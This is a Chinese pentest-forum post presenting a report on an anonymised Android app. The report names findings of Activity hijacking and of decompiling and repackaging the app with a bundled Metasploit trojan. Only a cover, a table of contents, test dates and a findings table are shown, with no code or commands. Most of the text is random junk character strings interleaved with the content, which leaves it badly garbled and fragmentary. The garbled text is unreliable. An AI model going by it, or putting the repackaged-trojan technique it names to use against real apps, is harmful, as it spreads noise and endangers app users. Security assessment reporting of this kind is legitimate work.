找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4141|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
: B: T4 O s; D0 M/ M3 P5 ] 2 h. ~- L/ O* ~2 {* ~- G6 @/ e5 Y

$ j- \( D4 v. t% ~2 K , r2 v' B& `1 r5 h' n
! J/ K0 x" F' u0 V/ ^! i; T, i * p& V4 y: o4 y* S

. o6 n6 x. w+ p; a ' C4 Y5 a4 s$ h5 ^
) W- e4 @( y! r# }* q4 o! | & Q: l; D* B3 x8 v6 u1 ^

( k+ N& w3 c! l1 J* V T+ V* S z. O: ~+ e1 u 文档编号:                1 O5 Z9 }0 q e0 ?. R0 w 8 o P) t' u1 y/ k

' ^% q$ I) G% P, \9 v) x( C : J- i& E2 {6 @ d" ^; M$ X! @

X2 N/ z# A( U9 L9 K3 u , o3 q3 J8 T% ^& @$ s# T   * @9 z& x' F; w0 E8 _% b: m2 T3 \! z/ } N/ |5 O* Y. X: K

" |8 V6 I, d7 z- Z ( r1 ~( W( Z# F8 D0 n7 s! e

- |5 K/ U: v1 l . v; k9 i( H# ]   ( w% t$ p3 x4 _5 y8 I5 I- D8 N; k+ z' M. z

8 d4 q, ~4 R0 y/ e. D, y - z& z. W" g5 r4 {. S' n& u4 F0 `

8 n5 R; X; Q7 T9 F/ r 7 D: z/ c3 ~, M/ P4 T2 y   ; A0 O) R7 v6 \/ l# i; C- d" Y1 d

`9 V- G+ f* |! x( P) f W0 W 2 }$ `+ A2 ?- _6 k3 J# M

& i4 a+ e7 E, }) o [/ ~- K n, a0 L. V, w   & b! v! v* H, Y# A " r) d; h" c: e6 {( y, e# ~

`' r u" N' o, t- w' O ! ~3 D6 N% t2 ?# X- D* P, V+ c/ _1 H

9 r0 T6 [: Q1 _- B) f5 Q6 P+ [5 f2 t& Z   3 N1 ^, Z) `' P: p7 T- D $ y& C, R! Q) {3 q# p9 Z- g+ p, I

. a, ?5 C' |! ^2 E" E y. D' |/ U" l$ J4 {3 ^; [: {7 C

+ ]- k# Z2 Q; R; ^ & t& q" w* @6 G 某某某APP渗透测试 9 z& r1 J. t; p/ a7 I* v1 s : ]' \9 p- d# Q z$ s/ [; U

5 K* e2 P2 M0 A& i ; S- o# [, ?; R/ Q$ _. C

`/ b3 j- C) F - B& t! M9 |! I   2 a" B: W. I/ E; v% H7 k2 ^" b $ U- [9 r. e0 k' H

; z2 `! _6 z; | y # T6 \8 M/ c' Q7 W: K& g& H7 |

8 G# i3 z& `2 m/ e , u: R' P5 b! A3 p" Q/ F2 Q, T   ! K7 H* M u2 P. i7 I ) J, ? v- e& C

( \3 ]; O' `" g0 v& X6 Y4 A ?: G1 R- f: Q" R: K) R; l

& G( M9 o$ ^1 }6 B$ j- X+ P. ?* X( {7 V! _   7 I2 O2 @, W$ |5 y2 O% b . r, |3 V: O+ D% p- h- _3 {

; b1 {/ X! m/ `# a- c9 Q- r & @2 k4 u1 F5 E! @: {; t

% t. Z* g6 K: K4 o6 [- N- y" ]2 _" i0 P8 t0 h* w9 V' f   I- @1 D$ o: [ 2 U L! @/ U. s0 L

% |8 s/ d( F8 {' }1 {8 g/ w9 I- W 5 f+ Q4 @# _( W9 Z

/ H; `2 c- u& w W8 `! y - }4 ^( E% D+ X1 Q7 p7 f 技 术 报 告 Y) @7 @, l" I9 t# Q5 ? / {; L5 X7 u6 ]1 B. p/ y" B

/ f3 ^4 u4 h) q4 }5 l2 v& M# y* D& \3 m* z: G

# ~* k# }' n4 Q. E, X- |# a; w / H$ n6 W' _$ U/ I0 [ z   4 g m& _# @+ D7 f5 {( v/ w$ F8 y

' ^0 L% D( ?( N4 ^2 p 5 T& K& \; T( F! g8 @' M0 @

& W9 }* c8 g% C" L. Y# D+ ?% [! E" V ; [+ A9 T: g6 A# D   6 D/ B8 t# B& _ - x% \9 F/ C0 A

; M0 T6 o' k4 W- _ W- N: T# E 2 `5 k9 b4 ?* n Z

6 z, X9 l9 a o. w7 X6 R 8 l+ Z$ `) t+ J6 y$ C   9 w& l" ]) e, i / @# G; w9 ]* C' h' H

0 E }9 i/ Q0 `: p+ \# X8 P7 r 1 z* A) [) Y" c# @6 @0 u

& u; v! U$ n- G 8 g- ~0 X$ Y$ ]0 X; q* M8 C% w! D   - N4 h3 ^) Z+ a( n3 x" Y) e# M! o9 v, E( Z

' @9 D" ~/ L: W% L* j- I0 Z5 F

1 H7 C6 I7 X) g9 g: r$ C6 {; W$ V. ?+ D7 \/ Y   : I/ j; n. C( Q. m6 Z% T' z- I8 a0 N& y( u; F

" Z' t, s" Z4 P6 m& R5 R0 w& @ 2 w5 O7 @+ \) P: X

& h9 f( E) ^8 P' u/ F+ Y; r8 b H P8 f, J, b   9 a. m0 W% F5 _! S2 U4 t& R: P 0 X! E% c: U* I7 E* {$ L

' v8 T* U u' @) a- I3 l3 N1 B8 X " U. Q7 v V% S- I: W }

/ D4 J3 }7 e7 [) J3 c; u& L( |& v+ P1 B6 ?7 P   . j2 [' Q) z/ e( K6 ?- j2 Q4 u1 \ I4 t9 |

0 ~: O0 v& O; j4 n. A 3 Y& @9 R0 P/ M$ \" V0 t

' y/ \, m/ _) ^3 V' W9 f 7 u, @% v# m: v9 a+ c4 u   " _' t1 v6 [8 I. V/ E " [* k# { s, O4 _% S& l% K

# |* _" Y \. q: h, N6 G) D) K4 S2 f6 u5 }$ d$ d# x" h

, |0 l8 c( p2 A) ]) k3 n, ^ + f3 e1 D" l% s3 x) v" e7 S   # S. u: K: L6 k2 `# w 0 T! t1 a' R4 {; Q5 u, {

X' F4 F5 ^3 X3 c7 k2 g. ^8 s% _" c( p

9 l/ h9 R, M' [6 P. d: \* Z5 D 5 Y- q) @- ]" p# l8 {   0 d* ?4 C* {# P" E7 Z a2 N8 X9 C8 R9 a* H3 a- B# E. }

: L' h7 Z6 Z. g4 u1 b: q ( c& D. Q6 Q5 a/ M3 j. b

$ `2 G: E! u% u; Y1 n$ C7 b8 `7 G8 f$ R : K/ I n9 M# r7 y" e8 N   # S P$ }, E8 Z# C4 T ; H6 \ O! w8 ?- l1 g

) l5 r3 k C$ f- x& K9 y. ? 9 ]% d6 [$ n& Y# q, w: ]

" \0 ^" L! N6 `9 s# d) J5 C 1 l9 ~4 C+ Y- g6 \4 w3 }7 ^* S# J   s3 b. j" O& s7 e. r+ [" G0 Z( E' E* @

5 @6 x% ?& F+ G9 y 4 Q6 V: Y6 |) p v

( H6 P9 S# E" u5 Q9 t8 ] 2 F. O! H# Y7 Y, i   $ H# x8 J9 P: @- c6 j1 `* T1 a) S2 G

" f, l5 E) R3 t! u' m5 W# r6 \ " ?5 _$ \* n1 }5 I% ~& ?. Q

! X8 T0 P0 y, S$ v0 f# S; s; D& Z; q" G V- P2 ^* a   , x+ I% S$ f( F. ^5 z 0 h1 E9 G# o& j3 v: P9 t

2 N' l( Y: b) ~( | Z1 T# I& T! Q 9 A6 w* q3 `$ v5 t( R8 A

$ I [' `' i* L6 V% X8 A" W' C5 G- M; p) r7 O   0 J# o" w2 `7 j* m) A3 o! t , ?$ Q _+ y: ?' P E

7 j& T' ?& H" l" [& D" M i$ t8 A( W+ e: J3 e4 ~

( z+ o; F: b% e1 R3 s0 c# [% [ _! _3 d1 r$ ~" B   / q1 W8 s) T+ `+ y, L * }4 c# |9 r3 \/ R- z6 b

: b! B8 u) Q1 z% ?/ t5 A4 J E" u4 z' E7 A+ L

) o4 L% C6 r2 W1 p7 j8 s- e3 X& T- N. J. h9 }/ B6 W! V7 X. c) ?2 h8 C   ; Y# t' }& k; T. h7 v 7 g, s! Q( p+ r9 ^5 y; e1 F

( F1 h q$ o; [ / B5 p0 k: f! i2 [8 A) L

$ R( ?( c6 p8 s 5 c& G0 k6 g& I7 T   8 g/ C3 A) R1 y% ~6 r1 v7 c % L% [% `3 Q; T( ~% h- Z3 V T9 E% [

- F+ H% H$ F, R! C/ r2 w" [# { $ m; O) R" D/ X8 F- t# r

# ^7 k9 O! r3 N: {# s ; P4 N1 |! _/ e5 h 二〇二〇年 _7 I. D1 B1 a* w2 o3 { L4 j; f/ o8 S

6 g1 g2 A/ c) ?# g2 v3 U 8 b5 d' P7 q- s2 O
1 W9 U M# i% p4 ^4 K0 \! f* l" m9 }/ U
O: H6 j" c/ [9 g/ d $ U3 E O1 R& Q+ e. c: i $ m% O+ c7 o1 @, {8 z5 a" N 4 B7 C; ^3 s4 j+ u: d
- t6 T, W9 n6 k; p2 f- b0 P ) t! i7 \8 E g8 _# W/ J5 k
* ]6 R( l# @* k e9 L# X$ x; f " X% J7 L7 k' f2 H) C
3 L; C2 y. F+ m% a3 [ 5 U' J2 o1 t8 K0 I$ s' i % M: W( b4 T2 [5 [! T+ s 2 [* T% S$ f; n; ?
. O0 _0 z2 H! J + P# j; F: Y8 R/ w7 F- V' j; j# V

& n8 H# n2 J5 x" l: }" R , r! F5 }0 P# f( Z$ }+ t 目 录 ' M- U' x- n* t0 \# a ( D( Y# p5 z) K* s# t; d* a

7 c, @: Q: E8 D0 @" q4 o8 F3 p# T3 t5 k+ ~7 d: m ) L0 w5 A7 ~: ~" d9 ?) p. w R+ a 8 N0 |6 F& Q8 y/ I0 r

$ @3 k! s5 C$ T* ^# @& W. \, ~6 d0 z* J: u3 N, [5 `( R# L   0 w! ?9 R: m$ l; J; Z- ], |% s3 V- L, d) [

+ y$ s7 S: B" u# l% a# r$ ~& l $ e- d8 Z4 z6 w. k

# } E0 c! L' j# Y* c, Y6 X* L3 f z* t8 ~ 1 概述... 3 0 |+ h# X0 o7 ^; a' F . ~ z+ F, y; c1 P

' `/ |* Y0 g8 X9 G! c- a5 R8 e% @4 `4 Z3 c0 w& \

8 H- U3 ^' b8 Z2 g3 x! m% A& [ " [+ F$ ~5 h8 `; f! s 1.2测试时间... 3 : D( k+ ] m8 w+ G9 @. x2 F. P & z. L# S/ U& l( G) o; a3 [

0 J5 e5 a i c+ Z. x1 [; t * h& t* S9 ^! i1 w# t* j: Y% K, _

$ P: ]1 L; B: a3 I, I: ] # K1 d; {# x' u+ l( E/ m 1.3测试对象... 3 * }2 o$ ?1 N) w1 b8 J# W ) M& B; I& R: D. J' a

1 W7 S2 U7 [1 n5 ?; B, |, }$ s# j' m0 ^1 Q: C

( H( n4 A x: ?. } 5 h! H4 W0 c/ r/ w" ? P 1.4测试结果... 3 ( t5 W% h* p, D' z+ h 8 _4 r/ K4 |9 B* ~9 z

; F) C! M# j/ B5 [$ K % ]+ q: [) x; A- r! h

' N' M( r! |9 K$ W+ |' T # k# P# b" e, p8 r* \* V 2 检测结果... 4 / g r8 {4 |# L5 t% z9 a& [% Z. a3 ]6 s

4 y0 f- D( `3 Y. Q * I2 S8 {% h9 Q4 Z

/ H3 {4 M3 _. H - F8 E5 Z" n4 T$ H6 s 2.1 某某某... 4 ( a. D. s8 N+ d, J) k : [! M' z% r- c

* b: n/ @# ` u3 w- n: o % E' W: Q! U4 V, X4 }+ g

/ R- e4 y" }* t8 o% V8 b ; J9 \% f# y; L 2.1.1检测目标... 4 * e9 W2 w, V8 Q0 y) m. f( [$ C2 Q# s7 o# Y

$ y) p$ f, |5 Q& W4 r2 O* r / {# l, R, o! a; a2 C

- p6 Z5 Q& Y' u* i& n - o, [5 y+ L$ j9 e6 o 2.1.2检测结果... 4 ' ~( z/ Q/ i6 f6 I; \+ B- Q% p# A# {) _2 y0 }

0 u" O0 A5 f% R# c" E 6 O6 c# I2 k. C1 ]! b6 P" n

3 i* l' [; O: F5 e4 _' [9 t1 }6 d' k9 }4 y6 N 2.1.2.1. 4 & Y0 H: F1 D5 j1 I ) N) G; l. A4 T0 W

0 @ }* Z0 Y( m# w $ w. Z) r1 ]0 m, a) k9 V, G. j# y

3 I1 g2 C7 x/ K; O , U# T, x/ n6 a9 {. |+ a 2.1.2.2. 6 . l" y0 _( C& z$ Z. ] & Q" F' r- ]% Z

- A- [3 z% S; X2 y6 K$ p" R5 m+ ] $ P/ ^) e7 Y: k& Q# N8 \0 z

( r3 j$ w; [! o) o- V& M0 F - A( m; s) L/ p; j1 g9 j0 T% ?# B9 B $ B* {5 m7 B+ L$ @- w( j& x' U* O0 @ . t: g6 Y; q' t

* ^) y9 p9 b% y% W- R) `% h3 c" t& g( i& H! k6 X f W 7 G7 A% M: Q; v* H6 J% Y & o/ q6 z& Z* A' T
" z1 k) `( `& T* ^. T m. Q( @0 E$ j 8 X1 L9 X1 Z: `* ^, ?) C3 n" q& f7 G6 K
) w6 z2 P; W6 d$ V' T L) d; K" T* D- q* u& Q " p+ ]/ Z0 q6 r* f , m( @. R+ D; X

) |! C2 c0 [+ c+ i ! @+ B7 @$ {; k$ O' w# f% z5 L 1 概述 1 x+ m6 O* [+ i) Z" y3 G' k , _. }& B7 ]0 h1 J" h4 N

$ H$ s1 j, V2 _& u 4 h! P: \- |# H6 ?0 ~5 u

/ w' T: V7 \8 n/ D8 E# \ . |( y2 ?( }9 W 1.2测试时间 " b# w* Z! d$ R1 P : N( T( I' b; \( E+ q' h) _

% _0 p* g# j \4 i* v9 h4 U7 s1 ^ : e9 Z( o3 q' c8 ^- I" k$ `. \ P: x! {% }( L. o% b- U1 m! s6 y2 N/ w3 X0 ~8 w4 G6 C+ R% g c/ \: f/ F; O+ p+ u' B5 C9 k A5 v' V) x j6 Q, [8 C; A! W' o( L7 u! T+ O5 D: W) U9 |, A, m4 X- m5 T" S+ |- j$ C5 [( Y: G0 M2 ?; ~0 s9 l( ]/ a1 ?& S1 B0 o& i* V7 s1 }4 h; _: i$ H% ^9 R- u' R9 y# w5 b2 Y8 K5 q$ R" u% r' A* a e* p# M+ v$ _; s3 y$ y! F+ _3 }$ H$ h; V) f0 {0 N; d; L% k+ N/ E( Q& B) Z6 U" _( ?2 N" {' Y4 q# K: r- Y: T! i5 C% }- O- {4 B/ Z$ d* {+ d n8 U* O+ O0 g T: J$ f! W4 D, E7 J' b1 T! P' Y6 o! U$ x4 X" Y7 q! Z, p; a; M, {0 v0 s, {$ I& {' [5 C. s( i" s [$ O n1 b: G( {/ M' y1 m: f2 a0 x4 G u/ V* A0 C7 j) ?5 p* Z) S- a" A6 p; d* X$ u+ X9 [8 V9 z) m- ~! G3 h- {
" h" B, f% d8 f: Z, [4 {/ T! M # R3 T8 B9 f- d. z9 q! b( z9 Z% C

2 Q! B, `) g2 }+ v / P' X* t" U' j) P( U, p$ B% ~ 渗透测试时间 / {) M2 j9 k( Y! g' x0 H# k + h8 _- L! x4 |

+ C! c% i/ |; o# Q( w) t % Y- W# G7 c3 K/ c
) A8 K; O! q$ N- B7 K: W j6 j3 Z" n5 }0 \9 b' L2 D

: r ?/ [" M2 P& Y5 s" D# [9 v4 Z2 T9 O: ?. D 起始时间 : V1 _5 h$ p+ g4 D* t/ | 8 [8 G/ y. b0 w$ Z

# c4 V5 J7 q" ~% B" G * U. D4 Z$ Q4 |1 k8 t+ Y 		H; r" s$ j( k7 N0 v ) D# \9 G" e t" y2 [ A

, G0 X' n7 f# z5 z |: Y3 R: \; {: p5 O8 v* Z 202046 ! X1 |4 Y+ ]6 Q( ^" t 4 g4 X1 [6 z# D& X2 j' R1 j) S

) S; f% N2 U- T9 j% Y0 ] i" g. N# A- }- ]9 h7 f; m1 u. _
) x% `" H2 j% `. i6 F6 @) ]/ {/ c. ?

$ } |, A$ z1 o! A : s/ b/ d1 M& ]9 W; N. N 结束时间 ! E; @' p3 i1 X' g" U; ` , b/ o) d" U7 Z8 t) e* @* V

) Z1 H8 [5 c/ H1 G. b6 q # ~* F0 e7 X8 Z, }* u/ c" h+ M 		! h8 H- |& d! f% } & m: d6 [; a) r d1 W/ l

% d) }* w s2 j6 s& J! P% Y/ N 3 g. j8 h9 b8 H. }( s, O 202049 * _5 q7 Z5 L& U' I- X! h, B% y: j" w! B

( f6 F- u- R5 Y( C" R) \ : U ^# Q, x( g6 m% `
+ ^- I& E4 @# P% x: V3 _+ m1 r p, i# C0 A0 ]3 ?

2 R z) |+ R* u4 u9 B2 V4 }/ K 1 S, E/ C7 s' E. t" U& O 1.3测试对象 ' i- k1 m- h! _$ n# i% c7 j4 L: V% V, _0 P

6 \- q4 ^! r( P( e1 b- ` / `! c$ Y3 ?# }. C8 R( Z- x* I

4 ~- k1 k( o ]2 m/ X 0 n! l4 ~9 W) g X& A$ _9 P: c 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 ~. t4 X j) I6 v K3 i3 A9 ~" M9 ]( u: R; h3 M: _+ D3 r

9 s' t( w: O- [9 w! w* U5 u; t& r 6 \8 [' }4 k# g6 ~' t' k X

% P0 i2 D% \8 v: B8 d; C 8 f) C' U- B% B 1-1 检测对象 - \- ?% \& _) \6 n( d- B ! J( U, G: w+ A& v; _, E

) U3 N. a: E+ E3 s" P7 l! i c, z0 M1 |8 m 4 j! h9 _3 p6 r4 J0 r) M! Q$ \% f; B9 L8 I% l2 y+ v% }' e$ q9 F) p4 s/ f; V/ J4 f/ e) m. A2 }/ Y6 E# W. o; o& S( O' L/ H9 V" _6 Q& ]$ I/ s8 S) h, q3 d9 X- N$ d! l* u( h& |" J& b$ b( F7 k) d$ N; R8 @" l1 ?& a# A. `' W. H4 W k2 h! p& ?) M5 y9 r# O: ]- G( c( }+ z, P9 H5 ?0 s% M) r1 ^6 s1 Q" c6 r; R: e6 h1 x. @/ X' b3 R1 P4 [( ?' L- I9 V- R& h5 y0 T( B$ @- R" i0 T3 T- I2 @& M$ g& n: F0 m+ o! U1 U, F, _4 i- ]$ e! K$ C; `) @8 H, A* l. O# d" X5 J0 K- T* f( ]7 f. X7 w- N- o2 V# ^) w9 E) I# s4 ^4 B4 o, z: i0 y9 x* S5 ~; f% Z/ z0 S" } |: z9 P6 b/ P, c+ }& p- w" q7 G7 l/ l Q9 p" V( f- i# s5 S- S$ \8 j, ^5 q4 I _1 l* y, I4 @- ]5 x ` l. Q4 n% E+ D" Z: E+ i8 l5 m/ B# N- R1 `) C' G/ W9 y8 x5 Y: I7 a0 X$ P- y2 H/ {1 e
" ?& i6 l' U; v/ G( F6 \ & v3 z4 `5 H- K% T! A+ R/ G! w3 g& ?8 [

/ K8 j9 q! U5 n, N$ A) { 5 T( c; b+ P. m 序号 & D# Z7 ~$ q- Q1 }; ^' B 6 S/ V% j: B# f# h

9 p: j @, u0 V) N6 k4 u9 E4 c$ O! p' M' X# t1 V2 [' P, \4 @8 d 		/ l1 B+ _$ D: M* X . X, }) h+ X3 v2 G. F5 g

) n' ?& _0 {9 C0 q2 c" ^1 t - d6 Z+ S S7 p; x9 h3 T6 U% i7 Y 测试对象 - n/ ?7 s$ s% V0 [% X# s7 v 7 z3 \9 _+ h3 Q* J2 n0 u0 s1 ~

4 e$ a, o/ Q! q) S; z, B7 u . y! @7 y4 i1 C, z4 L m9 F 		4 T4 \5 ] a8 c' \ 3 S' R2 O4 T* i1 l5 u4 z

1 S! s# [2 z0 q4 ~& i+ e. L5 J3 U, X - [' L" G. X4 f2 {+ L 测试地址 2 L9 `1 H) N! ~. F2 L 6 I$ C1 n# R+ q! M

, n/ p2 r3 p% q/ \- q 3 Y3 b) C' f5 E! q* C 		8 a' d e: e3 u# y D 9 o6 Q. R, g; `( E0 K2 W

. j+ g. e* a7 v8 x ; V* e, a) E( w* O+ ^3 r 安全漏洞 % D# ^& H+ W1 ^3 X6 c1 Z; N' H . T0 X, V7 n: V$ u) K" ~, [

7 l; x4 W7 v0 c: C* c u2 o + B- {# N- d. q8 y. n' ?1 B- R, f& i
_" c* F: K3 U8 P; j4 |; @1 \" r . c7 b* L( L3 r, w6 h

* q% O5 K" Y- c) p3 l* t9 V6 M. W& H/ Q; H/ U8 \& ]& _( T 1 # F9 q# ~2 \' ~2 T$ u ; v! Y# ~6 G4 Z& u$ l" J5 f/ ]

0 h4 V, D+ L3 i ; Y$ z; r6 w7 ^0 |1 \ 		% @9 C' r; c0 u) f) E ! Q4 B: t5 P' F$ d* ]

* B v/ q+ x0 u9 k% U 4 Y( d4 y3 Z" W T4 Q0 b9 J" i 某某某安卓APP u; @" w& w4 W; q( e- l7 |" D# g9 ^" {. ?! |

: o6 Y# a" B3 D/ ?( d/ b0 P# B' P4 r3 Z3 m% I8 g4 ~ 		) w5 ?( D5 ]: b' v7 [# _ 2 r. h0 I' X: |5 j

- i1 j0 Z D, y" k* g- d6 S5 a & Z5 Q2 `# L- e$ j   - {: S- n+ u# M- p/ ` 1 t. B; D& H4 c% d

$ \* ~1 V w% L1 q" i7 L+ J/ H" l 0 s: d/ ]* [2 v, M4 C 		. T. H) \5 A* L' h q+ y2 }8 m5 M8 V u0 v4 _9 B. E

% f2 a: q2 \) _0 i3 Q( C7 h. k/ z/ f, F. e 2 ! j- m0 ~7 A4 f; g- f4 s: j ( H5 m7 \6 X( R7 \, p" z$ s

% S t5 n" ^8 b2 d0 f3 V 9 U+ B" ?( q% U- Q6 A
, w2 ]* G u7 X: t w2 z. Z7 }2 ~8 ]

$ ~" f7 d# T, _. J1 ~ - P0 ?" a& D( K3 x& k, U7 {' b. w 1.4测试结果 & }# h5 q3 V/ m( X {! ` K$ R . F$ n+ j& | R, k2 |# x

( i; t7 a2 M5 c 5 ?7 P) {) Z0 F/ f

2 I- L% ]$ u) e3 ]! X% _ + `% O; x6 U7 }9 A W" F5 C 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # D- @0 ^6 C) G0 @* A4 u ( V5 H% {8 |# L4 h! q! O- w0 T9 D

$ I! X. i" M) v6 l) h! L% x & ]4 p1 \' H( t* H

) r1 w# u+ I4 R" { 1 J3 M8 t0 s0 _- z, u: u# t0 [( j   0 K1 a& @0 O+ x. H! k. v5 q! S' ]- `2 S9 b0 S

+ F6 \& q0 Z5 r; S* o& n" w8 a' V4 O * M7 `3 }% V; w7 h
2 b" P |+ x+ h: q2 |+ p% v9 P- v 9 w) M6 k, S- t 7 {& q3 q: h# n. }& g# ^+ D& b6 l! [5 ^* o- ~) h1 `4 p, h* G# d; N6 N5 Y5 I0 ~; d. V* o- d+ Y1 V+ q; Z9 i. D/ ~5 d' E' \( a) v# k% m" [' {6 Y4 x `6 M% l. `; S6 l8 y4 c/ q D' `8 e9 u/ S$ t. I$ d: e5 j5 @% H) e( o8 R% n/ z( n* D2 W. U8 n4 n" |, r! n4 z! @- v5 g4 G6 a6 v. K7 b1 }) |2 @$ b# t; o+ P4 w3 J6 r* D+ ^0 a# N% T: e$ b+ A1 G5 K4 C5 B1 ~2 k1 k- {1 @" o2 ^! A- m9 T9 o, M& Y- V- a# P. B/ f" _/ B& U. {. N7 i2 y$ ]- x; M* U$ X ~6 r# A1 J, C2 O) P$ J" X" M6 b. j) s% |2 x+ y1 d; W! q/ A6 M: F- t+ k. m; Y0 C6 V+ W6 s0 i" e3 i5 ]- m9 ~7 W; d: M* r# u& U& W; g2 w0 t* I2 y% \+ n! [! A \$ G/ m" N. J% h* l/ ]; J: i' [& Q( h+ m! {0 c- {# s( W7 u' |. Q6 }4 u6 f. v& {6 F% y0 ]: a i3 Q: X4 k: K6 h( \* x9 ^1 J$ J9 D5 D2 G% F% p. t8 t+ u- s/ \/ w2 N; |; \. A( x' U0 }: }8 ]$ B! k$ i% v* H5 Q4 @2 X6 H( h) j" F0 d4 I) ~6 G" M! t* J H |9 s8 t0 q# p4 v% s# F* l2 G. j: q# e; O, V5 Y( C! z( |+ f7 ?# m1 s: v( {! J6 b% j, E" B+ H" a/ \6 V# b- V+ m1 l; R! k4 q% b7 J% r& j) T! p' |9 h/ O; \/ h' J: [ _: L) o6 V, o2 t) n5 j! U4 ?% v. l. g! @7 w7 _, P1 |; f) i$ ~. Z) p
- K( {2 l- o4 u. P5 p 1 ]3 u9 s, a( Q( I2 p( ?

$ d6 V, Z+ b, P: @' a6 ^ % s r" R: \* {" `+ A T 序号 1 g% K7 U, P* D. e2 F0 f ( @& p% ?' {/ l1 Z; c5 q: \& ]$ ]

3 l9 |% x$ x+ j6 D / f1 g% o& J; V& C: t; N7 w# F 		! p0 p4 m, b1 t8 w( P e; m3 V" t6 T* r E! B

6 Y/ Q, {, [' v8 D8 u " ?9 ]! z6 X1 T 系统名称 # v1 x+ I8 d7 v' h1 P5 l; R% k# h- l4 [9 M! t0 m4 [

x0 E9 a6 y4 ^# {/ y8 r 4 R8 I. }' C0 Q& `+ L3 w 		6 ~! v7 @) I$ ^6 t* r4 W) t+ N

& ^ \1 n: q. |3 I $ G) R x2 D2 j 漏洞名称 3 b4 |$ z: y' J6 e9 c$ ] d" O9 M5 R 5 D, }6 G+ U: J8 ]: K

+ a4 ?3 |4 D6 E5 T' M1 p3 c- L / V u+ @& G2 A& _4 K 		# ?" I+ D( `4 _6 w: q0 X. v ! P/ c7 W: t k* g' w8 u+ s- U

( J' S( b* d3 Q- d 0 j2 {0 } y/ x+ O& @ 漏洞危害 4 `, i% i+ H, M4 F! i2 {& T3 [* h 8 W0 `! r C3 h9 N P3 b& K! v3 t

& f( u1 b3 s4 L% h$ ^: s4 C: m+ D Q2 |- K% Y6 Z+ f/ O 		+ i/ i) w, i) L# [ ; f- @3 s! @2 m

$ y5 t6 M E: z0 \ ) g. t- Q, J% R% b; S 修复结果 3 \6 B$ I& @0 a, K' ^) n1 T! ^/ [% z2 Y! m( m3 D

& T( ~% b, L1 U( d, V6 w/ p$ _8 e. _, _7 s
, ^0 E. _& ^7 g1 E3 f0 x # k: j4 y6 p4 }) w. I7 J

) ^$ m: N/ C/ @( R+ B& ? 6 j( ]+ Z& w7 l: T3 i, L# }8 \- s 1 J/ f: i2 m$ a z . v- `2 e: \& K7 z! G

* X9 k4 V7 c/ Y" w* @' i+ U6 P . D4 j: \1 s( Z% z/ e2 j 		6 O. [6 [9 }8 y( l* Z9 \2 a$ i& f. v( ]: u: T! P

1 A( ^$ Z2 s5 a }' }( V- L/ L ) p9 d0 z4 q* F& w. N q0 I 某某某某某某APP % \2 ?/ Q1 \# ]7 S# e, i ' ?; ~! L. K9 [ c% a

1 j8 J* ]( R+ W. ~! Q$ n* ~0 g- [# y 		9 O3 q( R ^! ^- d+ b: B% A 0 d u! I: `, E I+ g! @

8 e% [8 Z) T2 w; s) |* J2 K! ^ " ]) g: x5 ?2 a z Activity 劫持 % i* n) d! u% s& r & D1 ~$ i) W" J3 v0 z @. f

( {8 \, G1 J! x 1 l, w3 N* U' M

[1 n3 B" K/ e: p" @& P- D % Y& ^ ~( z5 K$ G, V% M   ; ?" N6 A9 Q/ k" [6 g & V9 N0 {# G/ z

6 S8 r P0 m% m7 m3 H. T + L' U6 o* M+ t; }5 m 		7 u: U2 O4 g+ {& }5 T" G2 p+ ^( o* k* P k* F* _

! S) G# D3 T, V# C# W0 O: V; b- _3 r) m8 D* e4 U / c! J9 }9 m6 w% h, V# \- }* r) ~# X 2 U Z; B9 g) t& ?; U7 x! o

3 v0 a. ?+ j. ?. b, S% ] 9 W) ]( Q2 t* s6 R r 		& p- j; J, B$ w3 E6 d/ y . p5 q7 v# T" M* F& u, Q

+ J* D0 j x& T; v* |% ]& r3 m2 f+ W. p9 N7 p# V8 Q! H   0 e! B, F, l% z# H ' s! s$ X+ M: N

. f/ g& a8 k0 a" [+ t" L7 w 7 I* V: Y/ Q7 v1 X: q8 O4 {" H$ [8 s) @
0 V+ c! E& G8 G7 t3 d! u" s5 u7 U0 H, `

9 [+ g" \! _7 L( R0 F7 v6 o% ? & k0 Y: s* w: s+ ^+ E 2 9 z$ s2 t, J3 }) s H / e2 C5 O9 V4 S# M

4 a6 n0 T: r: W1 E: `% f1 t( \" ^* X" d$ Q2 l6 P, p 		; F$ T7 Y* y g5 Q7 T2 [ 5 |6 m x2 J% @. ^9 h

" t1 a5 d, J' j7 K5 H& [) R( y- g% z% w9 w8 j1 I5 T 某某某某某某APP $ u, S% }- `0 ^& Q) J) u! p 6 R; j6 l; [ m

6 q/ f/ ]) y) R + m" s3 ~8 Y5 N* o0 u" E$ X 		5 o$ Q) Y9 x9 b& y/ F% }' W 5 I0 r6 X$ E- }* Q4 W

6 u3 {, W( ~. Q( e8 j% y0 u- Z* d% p) d 反编译二次打包捆绑木马、篡改APP代码 4 V5 h/ \$ ?* b, ~$ U9 F 0 J& g+ [. W8 ?$ y& Y

1 {+ c% W$ B0 c- \2 s# L- k ) ?4 f; F: R0 Z7 z6 r 		# W9 Q) J6 C7 z7 ?& Y( j* [ 4 S0 f5 b6 i& B( Q3 a

8 Y. }4 c( F) O! }2 p/ s ' z% g8 c- R& W# k. p ) G' H) m7 w( |$ F; t. X . K5 j. U% y$ p! [

, `; H+ J, y0 @; F; A7 R% L) g; S$ h9 F' W1 V 		5 e. d. Y4 B4 P- x J 3 K3 N. `- P2 K- ?, V6 S7 T

6 L2 X: s: _% n2 O5 ~$ Z2 m4 J$ @5 R1 z& K+ B   % t3 q+ T! k" e2 Q1 f9 B. p : o* L% B: Q4 Z6 m

5 D4 a0 k( m6 q/ Q 4 Z$ ]5 g/ D1 B% G8 ^
# \8 _+ B5 _( x- _2 L# T: f" R- @$ `6 {8 k" k. L! Z- D3 f
0 o3 z8 a" z6 O) E F9 C9 D8 @* n9 |) a- I

" c. L/ Y5 q, \% V8 B; m* S & e- A a v+ _: v/ {   ' L. @1 s' z* E/ k+ A4 _: }3 h' F' W# q$ ~# w0 a! w: L, W7 o% H! C

